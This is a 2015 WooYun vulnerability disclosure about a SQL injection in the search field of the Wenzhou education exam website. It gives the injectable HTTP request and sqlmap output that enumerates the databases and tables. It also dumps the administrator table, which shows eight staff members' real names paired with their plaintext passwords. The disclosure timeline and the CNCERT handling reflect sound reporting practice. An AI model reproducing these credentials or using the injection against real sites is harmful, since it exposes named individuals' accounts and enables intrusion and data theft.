当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145389

漏洞标题:温州教育招生考试网SQL注入漏洞,用户信息泄露

相关厂商:温州教育网

漏洞作者: 路人甲

提交时间:2015-10-09 23:07

修复时间:2015-11-28 08:50

公开时间:2015-11-28 08:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-09: 细节已通知厂商并且等待厂商处理中
2015-10-14: 厂商已经确认,细节仅向厂商公开
2015-10-24: 细节向核心白帽子及相关领域专家公开
2015-11-03: 细节向普通白帽子公开
2015-11-13: 细节向实习白帽子公开
2015-11-28: 细节向公众公开

简要描述:

号被盗, 连续提了三个漏洞,求快审核,给个邀请码

详细说明:

POST /search HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/search
Cookie: JSESSIONID=8D6C4CA7376D772CA2F7734FB218C517
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
keywords=&act=search
keywords存在注入

漏洞证明:

[18:08:52] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2000
[18:08:52] [INFO] fetching database names
[18:08:55] [WARNING] reflective value(s) found and filtering out
[18:08:55] [INFO] the SQL query used returns 7 entries
[18:09:08] [INFO] retrieved: master
[18:09:08] [INFO] retrieved: model
[18:09:08] [INFO] retrieved: msdb
[18:09:08] [INFO] retrieved: Northwind
[18:09:12] [INFO] retrieved: pubs
[18:09:12] [INFO] retrieved: tempdb
[18:09:12] [INFO] retrieved: wzksy
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] wzksyDatabase: wzksy
[25 tables]
+-------------------+
| dtproperties |
| sdb_bbs_area |
| sdb_bbs_forum |
| sdb_bbs_thread |
| sdb_dm_htlb |
| sdb_dm_ks |
| sdb_dm_lyzt |
| sdb_dm_yqlj |
| sdb_sys_addfiles |
| sdb_sys_menu |
| sdb_sys_param |
| sdb_sys_rights |
| sdb_sys_user |
| sdb_sys_usergroup |
| sdb_www_ad |
| sdb_www_addfile |
| sdb_www_category |
| sdb_www_link |
| sdb_www_lyb |
| sdb_www_news |
| sdb_www_redheader |
| sdb_www_ssyjs |
| sdb_www_zktzd |
| sysconstraints |
| syssegments |
+-------------------+
back-end DBMS: Microsoft SQL Server 2000
Database: wzksy
Table: sdb_sys_user
[8 entries]
+---------+------------+------------+------+--------+--------+----------+--------------+-----------+-----------+-----------+
| userid | groupid | qxlb | dwmc | status | lastip | realname | password | reserve_1 | lastlogin | reserve_2 |
+---------+------------+------------+------+--------+--------+----------+--------------+-----------+-----------+-----------+
| admin | 1 | 1 | 考试院 | 1 | NULL | 管理员 | kszx-2208 | NULL | NULL | NULL |
| chenchi | 10 | 1 | 考试院 | 1 | NULL | 陈驰 | ksy_dfdfi334 | NULL | NULL | NULL |
| ksycgz | 10 | 1 | 考试院 | 1 | NULL | 陈国柱 | 654321aabc23 | NULL | NULL | NULL |
| ksycyr | 2 | 1 | 考试院 | 1 | NULL | 陈奕如 | 1234561101 | NULL | NULL | NULL |
| ksyhhy | 6 | 1 | 考试院 | 1 | NULL | 胡浩宇 | 610718 | NULL | NULL | NULL |
| ksyhqc | 2 | 1 | 考试院 | 1 | NULL | 胡群策 | shisi14 | NULL | NULL | NULL |
| ksyhuyu | 4 | 1 | 考试院 | 1 | NULL | 胡宇 | 466345 | NULL | NULL | NULL |
| ksyjxh | 6 | 1 | 考试院 | 1 | NULL | 金选慧 | 88638087 | NULL | NULL | NULL |
+---------+------------+------------+------+--------+--------+----------+--------------+-----------+-----------+-----------+

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-14 08:49

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调网站管理单位处置.

最新状态:

暂无